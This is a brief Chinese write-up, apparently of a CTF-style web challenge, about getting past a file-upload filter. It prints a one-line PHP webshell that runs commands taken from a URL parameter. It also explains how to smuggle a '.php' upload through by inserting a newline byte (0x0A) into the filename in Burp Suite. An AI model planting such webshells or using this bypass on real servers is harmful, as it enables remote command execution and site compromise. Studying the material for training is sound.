Web页面:
新建一个一句话木马:
0.php
<?php system($_GET[0]); ?>上传木马, burpsuite 抓包。
直接上传是回显 bad file。
我们查看数据包的二进制内容(hex),内容是以16进制显示的,找到文件名那一栏,在 .php 的后面添加换行符,在ASCII编码表中,回车符的16进制表示是0x0D,而换行符的16进制表示是0x0A,所以在这里填 0a。
send 后,我们访问一下。发现木马上传成功。
相关推荐
Amy1870211182342 分钟前
中线安防保护器,也叫终端电气综合治理保护设备为现代生活筑起安全防线zhao3266857511 小时前
海外代理IP平台Top3评测:LoongProxy、神龙动态IP、IPIPGO哪家更适合你?云边云科技1 小时前
企业跨区域组网新解:SD-WAN技术打造安全稳定网络体系Whoami!1 小时前
⸢ 肆-Ⅰ⸥ ⤳ 默认安全建设方案:c-1.增量风险管控ZZHow10241 小时前
CTF-Web手的百宝箱XMZH030421 小时前
网络编程;TCP控制机械臂;UDP文件传输;0910;ps今天没写出来Katherine_lin3 小时前
UDP特点及报文结构猫耳君3 小时前
汽车网络安全 CyberSecurity ISO/SAE 21434 测试之一Rverdoser3 小时前
如何打造自主安全的下一代域名系统刘 大 望4 小时前
传输层:UDP/TCP协议